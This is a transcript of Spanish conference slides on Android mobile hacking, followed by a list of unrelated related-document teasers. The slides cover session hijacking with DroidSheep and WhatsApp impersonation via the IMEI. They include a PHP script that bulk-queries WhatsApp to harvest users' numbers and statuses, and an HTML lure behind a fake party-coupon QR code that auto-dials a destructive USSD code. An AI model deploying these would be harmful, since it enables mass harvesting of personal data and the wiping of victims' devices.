Tamaño: px
Comenzar la demostración a partir de la página:

Download ""

Transcripción

1

2

3

4 DISCLAIMER Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación. La información contenida debe ser utilizada únicamente para fines éticos y con la debida autorización. Todo descubrimiento realizado, ha sido y será usado de forma legal. La audiencia debe asumir todo lo que se exponga hoy, como falso y sin fundamento hasta que lo compruebe personalmente. Limahack no es el autor directo de ninguno de los descubrimientos expuestos, ni de las herramientas demostradas, ni los conoce. Todas las opiniones vertidas durante esta presentación son exclusivas del expositor, Limahack no es responsable de ninguna de las opiniones vertidas.

5

6 aula H4XOR Android mobile hacking: ataques y atacando con el androide Omar Palomino Por qué Android? Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android

7 Quién soy? Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas Certificado CEHv7, Security+, ITILv3 Consultor en Seguridad de información Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres:

8 Por qué Android? Participación en el mercado de Sistemas Operativos móviles 5% 17% 4% 4% 2% 0% 68% Android IOS Blackberry Symbian Windows Linux Otros

9 Por qué Android? Otros sistemas operativos ya no tienen participación en el mercado (RIP Blackberry) Los hackers están buscando nuevos objetivos (nuevos retos!!), siempre a la vanguardia.

10 Por qué Android? Se pueden realizar ataques cada vez mas sigilosos (ya no es necesario una laptop para realizar ataques) Es muy común que a través de Android nos. Conectamos a redes wireless libres Accedamos a correo electrónico Accedamos a redes sociales Realicemos transacciones financieras

11 La agenda de hoy: Atacando S.O Windows Forense de tráfico generado x Android Ataques de red LAN Android vs Metasploit

12 Requisitos: Tener el Android rooteado (super privilegios). Todas las herramientas interesantes requieren de super-privilegios. Analizar la mejor situación para realizar un ataque. Utiliza tu Android es un gran amigo.

13 Atacando Windows Tool: Anti (Android Network Toolkit) Con Anti podemos: Buscar vulnerabilidades Auditoría de passwords Ataques de man in the middle Ejecutar comandos en el SO Descubrir tráfico inseguro en la red

14 Atacando Windows

15 Atacando Windows USO DE NMAP SCANEO DE PUERTOS DETECCIÓN DE SIST. OPERATIVO SCRIPT DE VERIFICACIÓN DE VULNERABILIDADES

16 Atacando Windows

17 Atacando una red LAN Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook, Hotmail, Twitter) El código fuente es libre: Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear. WTF!!!! La comunidad XDA-developers sigue sacando nuevas versiones del software. (http://forum.xdadevelopers.com)

18 Atacando una red LAN Funcionamiento: Session Hijacking 1 El usuario ha ingresado normalmente a una aplicación web comercial o corporativo, como: Hotmail Facebook Twitter 2 DROIDSHEEP capturas las cookies asociadas a la sesión creada y las utiliza. No es necesario capturar la contraseña.

19 Atacando una red LAN Funcionamiento: Session Hijacking Droidsheep reconoce las cookies de aplicaciones como Facebook y Hotmail, además te puedes enviar las cookies por correo electrónico.

20 Atacando una red LAN

21 Análisis de Tráfico Android Cada vez utilizamos nuestros celulares para conectarnos a Internet. La mayoría de las personas se conecta a redes wireless abiertas. Como TÚ!!! Muchas aplicaciones no encriptan la información que envían, las envían en texto plano.

22 Por qué es interesante analizar el tráfico de red.?

23 Por qué es interesante analizar el tráfico de red.?

24 Análisis de tráfico - Whatsapp Whatsapp se ha convertido en un mecanismo para el envío de mensajes muy popular. Es muy parecido a los SMS pero gratuito (hasta el momento). Tiene serios problemas para dar seguridad a la información que envía hacia internet porque enviaba todo en texto claro. Ahora envía la información con un HASH MD5

25 Pero es sólo un simple MD5 Whatsapp tiene serios problemas de seguridad, analicemos: Cada vez que Whatsapp inicia debe verificar si tus contactos cuentan con una cuenta activada. Para eso se conecta a una URL y consulta el estado de tus contactos, por ejemplo: https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=<a>&me=<b>&u[]=<c> <A>:Código de país del número a consultar <B>: Número a consultar <C>: Cualquier número de WhatsApp (o el mismo número)

26 Pero es sólo un simple MD5 Número del teléfono consultado Estado y mensaje del Whatsapp Número del teléfono consultado

27 Cuánta gente tiene Whatsapp en el Perú? El ministerio de transportes y comunicaciones nos dará una manito:

28 <?php mysql_connect("localhost","root", password"); mysql_select_db("limahakc2012"); for($i= ; $i<= ;$i++){ Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR $whatsapp ="https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=51&me=".$i."&u[]=".$i; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,curlopt_useragent,'whatsapp/2.6.7 iphone_os/5.0.1 Device/Unknown_(iPhone4,1)'); curl_setopt($ch, CURLOPT_URL, $whatsapp); $cuerpo = curl_exec($ch); curl_close($ch); https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=51&me= &u[]= if (preg_match('/<key>/',$cuerpo)) { $explodeo_datos = explode('<dict>',$cuerpo); $explodeo_estado = explode('<key>s</key>',$explodeo_datos[1]); $explodeo_estado = explode('<key>jid</key>',$explodeo_estado[1]); }}?> $query1 ="insert into WhatsApp_users3 (numero,mensaje,status) values ('".$i."','".$$explodeo_estado[0]."',1) "; mysql_query($query1);

29 EL ATAQUE:

30 Cómo envía Whatsapp los mensajes? WhatsApp tiene un mecanismo de autenticación basado en SASL DIGEST MD5. Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password, pero obviamente el password no se envía ya que sirve para generar el CHALLENGE (MD5) PASSWORD? Pero si nunca pusimos un password. El password es: Android: IME (International Mobile Equipment Identity) Iphone y otros: la MAC

31 WhatsApp - API API no oficial de WhatsApp Está bajo licencia MIT refer to the source code for the extra line INGENIERIA REVERSA

32 El ataque: obteniendo el IMEI Si obtenemos el IMEI podemos suplantar una identidad de alguien y ademas recibir sus mensajes. OJO: Si te haces pasar por esa persona y recibes los mensajes, la verdadera persona no los recibirá. Moraleja: El celular es como el calzoncillo.. No se presta a nadie a nadie!!!

33 EL ATAQUE:

34 Atacando Android

35 Atacando Android Utilizaremos el Android Virtual Device para hacer nuestras pruebas. El objetivo es obtener información sensible de los teléfonos celulares. Lo más importante es tener actualizado siempre el celular. A veces, no basta con tenerlo actualizado porque sólo se sacan actualizaciones para los últimos modelos.

36 Atacando Android Utilizaremos un módulo auxiliar de Metasploit para realizar el ataque.

37 Atacando Android

38 EL ATAQUE:

39 Códigos USSD El USSD (acrónimo de Unstructured Supplementary Service Data, Servicio Suplementario de Datos no Estructurados en inglés) es un servicio para el envío de datos a través de móviles GSM, al igual que el SMS. Es usado normalmente para comunicación con el proveedor de telefonía, generalmente para servicios de mensajería en tiempo real. Aquí algunos códigos USSD: *#06# *150# *2767*3855# (no deberías ejecutar este)

40 Códigos USSD Así como existe los links para enviar correo: <a Enviar </a> También existe el mail para LLAMAR : <a href="tel: ">llamar LIMAHACK</a> Algunos códigos USSD no necesitan la intervención de marcado para ser ejecutados, simplemente se ejecutan, pueden probar esto: *#06# Entonces que pasa si

41 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:

42 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:

43 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:

44 EL ATAQUE: <html> <head> <title>fiesta LimaHack 2012</title> <meta http-equiv="refresh" content="0;url=tel *2797*3855%23 "> </head></body> </html>

45 Aplicaciones APK Maliciosas > Se han heredado todas las malas costumbres del mundo Windoneano, todos instamos dando NEXT, NEXT, NEXT > Sabemos lo que realmente estamos instalando en nuestro celular?

46 Google Play y la política.. Información personal y confidencial: no se permite la divulgación o la publicación no autorizada de información de carácter privado o confidencial de los usuarios (como números de tarjetas de crédito, de la Seguridad Social, del permiso de conducir o de otros documentos ) ni de cualquier otra información que no sea de acceso público. El problema es que NADIE lo verifica.

47 Instalaremos una aplicación https://play.google.com/store/apps/details?id=com.elpalo mo.reservations

48 Google Play y la política.. Antes de instalar el APK: Después de instalar: Créditos: Developer de aplicaciones para Android

49 Google Play y la política..

50 Google Play y la política..

51 Google Play y la política..

52 EL ATAQUE:

53 Conclusiones Android es una herramienta muy potente para realizar pruebas básicas de penetración de sistemas, a nivel de sistema operativo y redes LAN. WhatsApp presenta debilidades de seguridad de información importantes. El celular nunca se presta!!!! Nunca!! Existen diversas vulnerabilidades en sistemas Android : Códigos USSD y a través de Metasploit para versiones antiguas de Android. Google Play tiene una política de seguridad de información, sin embargo, no verifica que las aplicaciones cumplan con dicha política. Actualiza tu Android, verifica los permisos otorgados a cada aplicación y no instales APK files de dudosa procedencia.

54

55

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com

Más detalles

Usted debe ser cliente y mantener un producto activo con el banco. 6. Qué tipo de transacciones puedo realizar en la Banca en Línea?

Usted debe ser cliente y mantener un producto activo con el banco. 6. Qué tipo de transacciones puedo realizar en la Banca en Línea? Preguntas frecuentes Banca en Línea 1. Quiénes pueden tener acceso a Banca en Línea? Toda persona natural o jurídica que cuente con un producto activo en el Banco Nacional de Panamá. 2. Cómo debo afiliarme

Más detalles

In-seguridad y malware en dispositivos móviles

In-seguridad y malware en dispositivos móviles In-seguridad y malware en dispositivos móviles Damián Muraña damian @ murana.uy @damianmurana damianmurana@joindiaspora.com www.murana.uy Para qué usamos los móviles? 03/2013 Com. por internet E-Mail Noticias

Más detalles

OBJETIVOS DE LA CAPACITACION

OBJETIVOS DE LA CAPACITACION OBJETIVOS DE LA CAPACITACION Cuando empiezan a funcionar tus correos. Utilizar tu correo por Web. Cambiar la contraseña de tu correo. Configurar Redireccionamientos. Crear Auto Contestadores. Configuración

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

Sistema de comunicación móvil con cifrado de seguridad. Hermes es un SISTEMA de COMUNICACIÓN CIFRADA para MÓVILES

Sistema de comunicación móvil con cifrado de seguridad. Hermes es un SISTEMA de COMUNICACIÓN CIFRADA para MÓVILES Qué es Hermes? Hermes es un SISTEMA de COMUNICACIÓN CIFRADA para MÓVILES Para qué sirve Hermes? Hermes nos permite comunicarnos con nuestros contactos con la garantía de que nuestra privacidad no está

Más detalles

Tendencias para asegurar la Movilidad. Jessica Cerna Channel Manager Andina y Caribe

Tendencias para asegurar la Movilidad. Jessica Cerna Channel Manager Andina y Caribe Tendencias para asegurar la Movilidad Jessica Cerna Channel Manager Andina y Caribe Agenda Como llegamos aquí Tu vida diaria Tendencias Necesidades de los clientes La propuesta de SOPHOS Como llegamos

Más detalles

Agenda. OWASP Seguridad Para Móviles. Introducción Riesgos más comunes Vulnerabilidades más comunes Mejores Prácticas Recomendaciones & Conclusiones

Agenda. OWASP Seguridad Para Móviles. Introducción Riesgos más comunes Vulnerabilidades más comunes Mejores Prácticas Recomendaciones & Conclusiones Copyright The Foundation 11 Nov. 2011 Seguridad Para Móviles Alexandro Fernandez Security Consultant Sm4rt Security Services alexandro@sm4rt.com 55 3520 1675 Agenda Introducción Riesgos más comunes Vulnerabilidades

Más detalles

Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información

Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información Guía de Cifrado Preguntas y respuestas sobre el cifrado de la información personal La guía para aprender a cifrar tu información 2 Qué es lo que estamos cuidando? A través del cifrado cuidamos de fotos,

Más detalles

Delitos. Informáticos GUÍA DE USUARIO DELITOS INFORMÁTICOS

Delitos. Informáticos GUÍA DE USUARIO DELITOS INFORMÁTICOS GUÍA DE USUARIO DELITOS INFORMÁTICOS El uso de Internet, además de darnos mucha información, también nos ofrece algunos peligros. Al igual que nuestro mundo real, en el mundo virtual también hay gente

Más detalles

Webinar Gratuito Hacking Ético

Webinar Gratuito Hacking Ético Webinar Gratuito Hacking Ético V. 2 Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Informática Forense & GNU/Linux Sitio Web: http://www.reydes.com e-mail: ReYDeS@gmail.com Jueves 30 de Octubre

Más detalles

SMS FACEBOOK CHAT. Guía de usuario

SMS FACEBOOK CHAT. Guía de usuario SMS FACEBOOK CHAT Guía de usuario SMS Facebook CHAT Qué es SMS Facebook CHAT? Es el servicio que te permite estar online en el chat de Facebook sin necesidad de tener un plan de datos. Solo necesitas tener

Más detalles

Seguridad. Estos son algunos de los elementos de alta tecnología que BANCOLOMBIA utiliza para garantizar la seguridad en sus transacciones:

Seguridad. Estos son algunos de los elementos de alta tecnología que BANCOLOMBIA utiliza para garantizar la seguridad en sus transacciones: Seguridad Su información está segura en BANCOLOMBIA En BANCOLOMBIA nos hemos propuesto asegurar la confidencialidad, disponibilidad e integridad de la información, uno de nuestros recursos más valiosos.

Más detalles

Retos de seguridad en banca móvil

Retos de seguridad en banca móvil 7 de Noviembre de 2013 Retos de seguridad en banca móvil Antonio Ayala I. En el 2016, cerca de 550 millones de personas, utilizarán servicios bancarios móviles Forrester, 2012 Mobile Banking for Developed

Más detalles

3-ANÁLISIS DE VULNERABILIDADES

3-ANÁLISIS DE VULNERABILIDADES 3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna

Más detalles

Servicio de Internet móvil

Servicio de Internet móvil Guía básica Servicio de Internet móvil Información General Qué es Internet? Es una herramienta que nos permite intercambiar, compartir y buscar información. También puedes navegar por páginas para chatear,

Más detalles

Seguridad en la banca electrónica.

Seguridad en la banca electrónica. <Nombre> <Institución> <e-mail> Seguridad en la banca electrónica Contenido Banca electrónica Principales riesgos Cuidados a tener en cuenta Fuentes Banca electrónica (1/4) Permite: realizar las mismas

Más detalles

EEHC. Enhacke Ethical Hacking Certification

EEHC. Enhacke Ethical Hacking Certification EEHC Enhacke Ethical Hacking Certification Curso de Certificación de Hacking Ético ENHACKE S.A.C. Año 2010 ENHACKE ETHICAL HACKING CERTIFICATION EEHC INTRODUCCION El curso EEHC provee el conocimiento necesario

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Práctica 1. Ethical Haking. Pentest en la red.

Práctica 1. Ethical Haking. Pentest en la red. Administración de la seguridad informática (Planes y respuestas a contigencias) Práctica 1. Ethical Haking. Pentest en la red. dsc.itmorelia.edu.mx/~hferreir/isms/practica1/ Introducción. CEH (Certified

Más detalles

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD En este tema, os vamos a dar a conocer una serie de aplicaciones o programas que os pueden ser de mucha utilidad, en función a las necesidades

Más detalles

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD MÓDULO 2: LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD TEMA 1 INVOICE BUBBLE Web oficial: http://invoicebubble.com Soporte/s en los que funciona: Es una aplicación web. Funcionalidades: o Crear

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

DESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA

DESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA DESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA La Auditoría de las Tecnologías de la Información y las Comunicaciones adquiere cada vez mayor importancia, debido a la necesidad de garantizar

Más detalles

1. Qué es Escudo Movistar para móviles?

1. Qué es Escudo Movistar para móviles? 1. Qué es Escudo Movistar para móviles? Es una solución de seguridad para teléfonos móviles inteligentes (Smartphones) la cual presenta una gran variedad de funcionalidades dependiendo del paquete contratado,

Más detalles

#Hacking dispositivos ios

#Hacking dispositivos ios #Hacking dispositivos ios [iphone/ipod Touch/ ipad] Autor: Japson Índice Disclaimer...3 Introducción...3 Cambiando el password por defecto.3 Crackeando el password de OpenSSH. 4 Escenario..4 Detección

Más detalles

Asistente RACC Móvil

Asistente RACC Móvil Smartphones Asistente RACC Móvil Para configurar Internet/servicios y resolver las posibles incidencias con tu smartphone Android. Válido para las diferentes versiones del sistema operativo Android Esta

Más detalles

Amenazas al usuario final. Cómo se protege doña Rosa?

Amenazas al usuario final. Cómo se protege doña Rosa? Amenazas al usuario final Cómo se protege doña Rosa? Introducción Por qué el usuario final se ve amenazado? Hoy en día, casi todos somos usuarios informáticos El usuario maneja información Muchas veces

Más detalles

Recomendaciones de Seguridad Red Social Twitter

Recomendaciones de Seguridad Red Social Twitter Recomendaciones de Seguridad Red Social Twitter Medidas de seguridad para Twitter Tras varios ataques a cuentas de reconocidas empresas, Twitter anunció nuevas medidas de seguridad. Cualquier usuario que

Más detalles

Diseño de aplicaciones móviles seguras en Android. alvaro.ospina@upb.edu.co aospina@gmail.com

Diseño de aplicaciones móviles seguras en Android. alvaro.ospina@upb.edu.co aospina@gmail.com Diseño de aplicaciones móviles seguras en Android alvaro.ospina@upb.edu.co aospina@gmail.com Agenda Que es Android? Historia? Arquitectura Herramientas Medidas de seguridad Que es Android? Pila de software

Más detalles

Seguridad en Smartphones

Seguridad en Smartphones Tendencias de la Tecnología en Seguridad Informática 2009 Seguridad en Smartphones Hernán Costante hcostante@cybsec.com 16 de Septiembre de 2009 Buenos Aires - Argentina Qué es? Es un dispositivo móvil

Más detalles

Universidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad

Universidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Universidad Técnica Federico Santa María Departamento de Electrónica Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Integrantes: Edson Contreras C. Luis Marcel Barraza M. Fecha:

Más detalles

Introducción: Seguridad Activa: Medidas de Prevención. Objetivo: Evitar daños en sistemas informáticos antes que ocurran. Mecanismos de protección

Introducción: Seguridad Activa: Medidas de Prevención. Objetivo: Evitar daños en sistemas informáticos antes que ocurran. Mecanismos de protección Introducción: Seguridad Activa: Medidas de Prevención. Objetivo: Evitar daños en sistemas informáticos antes que ocurran. Mecanismos de protección contra intrusos: Protección contra personas y/o programas.

Más detalles

Política de privacidad de Norton Mobile

Política de privacidad de Norton Mobile Durante más de dos décadas, los consumidores han confiado en Symantec y la marca Norton en todo el mundo para proteger sus dispositivos informáticos y los recursos digitales más importantes. Protegemos

Más detalles

Principales riesgos de seguridad en aplicaciones móviles OWASP Mobile Top 10

Principales riesgos de seguridad en aplicaciones móviles OWASP Mobile Top 10 Principales riesgos de seguridad en aplicaciones móviles OWASP Mobile Top Mauro Flores mauflores@deloitte.com mauro_fcib UySeg Modelo de Amenazas (Threat Model) Mobile Top La Lista 1 Almacenamiento Inseguro

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

RESUMEN DE SERVICIOS

RESUMEN DE SERVICIOS RESUMEN DE SERVICIOS Confidencial Enero 2014 Tabla de contenido Análisis de vulnerabilidades... 4 Por qué contratar el servicio?... 4 Características... 4 Plataformas... 5 Por qué confiar en GAIDEN?...

Más detalles

REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS

REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS DIRECCIÓN DE INFORMÁTICA Y SISTEMAS DIVISIÓN DE FORMACIÓN

Más detalles

Hacking ético. Módulo III Hacking del sistema

Hacking ético. Módulo III Hacking del sistema Hacking ético Módulo III Hacking del sistema Tipos de Ataques a Passwords Ataque por diccionario Ataque por fuerza bruta Ataque híbrido Ingeniería Social Shoulder surfing 2 Hashes: Autenticación en Windows

Más detalles

Presentación. Taller de Llamadas y videollamadas

Presentación. Taller de Llamadas y videollamadas Presentación Taller de Llamadas y videollamadas Desde el Departamento de Industria e Innovación del Gobierno de Aragón, se promueve la realización de este taller, con el objetivo de dar a conocer las herramientas

Más detalles

iphone en la empresa Administración de dispositivos móviles

iphone en la empresa Administración de dispositivos móviles iphone en la empresa Administración de dispositivos móviles iphone es compatible con la administración de dispositivos móviles, brindando a las empresas la capacidad de administrar implementaciones a escala

Más detalles

SOLUCIONES PARA EMPRESA

SOLUCIONES PARA EMPRESA SOLUCIONES PARA EMPRESA 2 Soluciones para empresa Tanto si acabas de montar tu empresa como si ya lleva tiempo establecida, hay algunas cosas que deberías esperar del producto de seguridad que usas a diario.

Más detalles

Ciberdefensa Desafíos tecnológicos. Hugo Carrión G. Junio, 2014

Ciberdefensa Desafíos tecnológicos. Hugo Carrión G. Junio, 2014 Ciberdefensa Desafíos tecnológicos Hugo Carrión G. Junio, 2014 Clasificación y Control de Activos El nuevo valor de la información requiere indiscutiblemente un alto nivel de seguridad a fin de lograr

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Profesor Ing. Juan N. Mariñas R. Marzo 2012 Julio 2012

Profesor Ing. Juan N. Mariñas R. Marzo 2012 Julio 2012 Profesor Ing. Juan N. Mariñas R. Marzo 2012 Julio 2012 1. Certificados Digitales 1. Formatos 2. Autoridades de Certificación 2. Firmas Digitales 3. Comercio Electrónico 1. Participantes 2. Elementos 4.

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Buenas Prácticas de Seguridad en el uso de dispositivos móviles. Alfredo Aranguren Tarazona, CISSP, CISA, CISM

Buenas Prácticas de Seguridad en el uso de dispositivos móviles. Alfredo Aranguren Tarazona, CISSP, CISA, CISM Buenas Prácticas de Seguridad en el uso de dispositivos móviles 1 32% de los usuarios creen que no se requiere software de seguridad en sus dispositivos móviles Fuente: McAfee 2 Estado actual de la seguridad

Más detalles

USO SEGURO Dispositivos móviles y MEDIDAS DE PRECAUCIÓN

USO SEGURO Dispositivos móviles y MEDIDAS DE PRECAUCIÓN USO SEGURO Dispositivos móviles y MEDIDAS DE PRECAUCIÓN SEMINARIO ONLINE 1 ÍNDICE INTRODUCCIÓN....... 01 Pág. MÓDULO 1. CONSEJOS PARA PADRES Y TUTORES SOBRE EL USO DE DISPOSITIVOS MÓVILES... 02 MÓDULO

Más detalles

Fácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore.

Fácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore. FACTURA ELECTRÓNICA ASPECTOS GENERALES La validez de una factura electrónica es exactamente la misma que una factura en papel y gracias a la certificación efectuada por el SRI se garantiza su integridad

Más detalles

MALWARE EN DISPOSITIVOS MÓVILES ANDROID

MALWARE EN DISPOSITIVOS MÓVILES ANDROID MALWARE EN DISPOSITIVOS MÓVILES ANDROID MALWARE EN DISPOSITIVOS MÓVILES ANDROID INDICE SMARTPHONES TIPOS DE AMENAZAS MODELO DE SEGURIDAD EN ANDROID MALWARE SOLUCIONES EJEMPLO DE APLICACIÓN CON FLURRY SMARTPHONES

Más detalles

POLÍTICA DE SEGURIDAD DE CORREO ELECTRÓNICO

POLÍTICA DE SEGURIDAD DE CORREO ELECTRÓNICO POLÍTICA DE SEGURIDAD DE CORREO ELECTRÓNICO PSHCM_01 2 0 1 3 NOTA DE CONFIDENCIALIDAD DE ACUERDO A CLASIFICACIÓN Este documento es de propiedad exclusiva del Hospital Clínico de Magallanes y su uso debe

Más detalles

Portal de Autoservicio Registro, descarga & activación de una credencial de software (soft token)

Portal de Autoservicio Registro, descarga & activación de una credencial de software (soft token) Portal de Autoservicio Registro, descarga & activación de una credencial de software (soft token) Emisión del documento: 3.2 Fecha de emisión: septiembre de 2014 Contenido Introducción... 3 Acerca de la

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

GUÍA BÁSICA DE SEGURIDAD EN INTERNET. Lo que TODO el mundo debe saber, especialmente a la hora de hacer transacciones comerciales.

GUÍA BÁSICA DE SEGURIDAD EN INTERNET. Lo que TODO el mundo debe saber, especialmente a la hora de hacer transacciones comerciales. GUÍA BÁSICA DE SEGURIDAD EN INTERNET. Lo que TODO el mundo debe saber, especialmente a la hora de hacer transacciones comerciales. Un mensaje previo: ante todo, tranquilidad. Los datos de una tarjeta de

Más detalles

Como crear una app gratis para tu negocio con Appmakr

Como crear una app gratis para tu negocio con Appmakr Como crear una app gratis para tu negocio con 1 ÍNDICE 1 Introducción 3 2 Conceptos básicos de una App 4 Repositorios de Aplicaciones de Software libre 1 Introducción 3 INTRODUCCIÓN Introducción al concepto

Más detalles

Hacking Ético & Seguridad Ofensiva

Hacking Ético & Seguridad Ofensiva Hacking Ético & Seguridad Ofensiva INDICE DATOS DEL CURSO OBJETIVOS DEL CURSO CONTENIDO MATERIALES Y RECURSOS DEL CURSO EVALUACION DATOS DEL CURSO Duración: 6 Jornadas (30horas), (08:00 am a 13:00 pm)

Más detalles

http://www.villacorp.com Pentesting con Android Ing. Javier Villanueva

http://www.villacorp.com Pentesting con Android Ing. Javier Villanueva http://www.villacorp.com Pentesting con Android Ing. Javier Villanueva Quién Soy? Ing. Javier Villanueva Consultor, Investigador e Instructor Independiente en Seguridad Ofensiva ( Hacking Ético ) Director

Más detalles

Herramientas útiles para gestionar tu negocio

Herramientas útiles para gestionar tu negocio Herramientas útiles para gestionar tu negocio GESTIONA TUS RESERVAS: GOOGLE CALENDAR MARKETING PARA DISPOSITIVOS MÓVILES: MENSATEK Y MASSYPHONE MARKETING PARA CORREO PUBLICITARIO Y PROMOCIONAL: MAILCHIMP

Más detalles

Protegiendo las comunicaciones Seguridad de la información ante la generalización de los dispositivos móviles

Protegiendo las comunicaciones Seguridad de la información ante la generalización de los dispositivos móviles Protegiendo las comunicaciones Seguridad de la información ante la generalización de los dispositivos móviles Marisol Oliva Consultora de Seguridad Telefónica España. Grandes Clientes Índice 1. Introducción:

Más detalles

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3

Más detalles

Bienvenido a NissanConnectMR

Bienvenido a NissanConnectMR MR Bienvenido a NissanConnectMR Ahora podrás llevar tu mundo a donde vayas, gracias a la tecnología NissanConnectMR. Conócelo y descubre el verdadero significado de la innovación. Sincroniza tu vida Qué

Más detalles

1. Acceda a la página Web www.etopuponline.com/+movil. 2. Seleccionar el ícono Regístrate gratis Aquí.

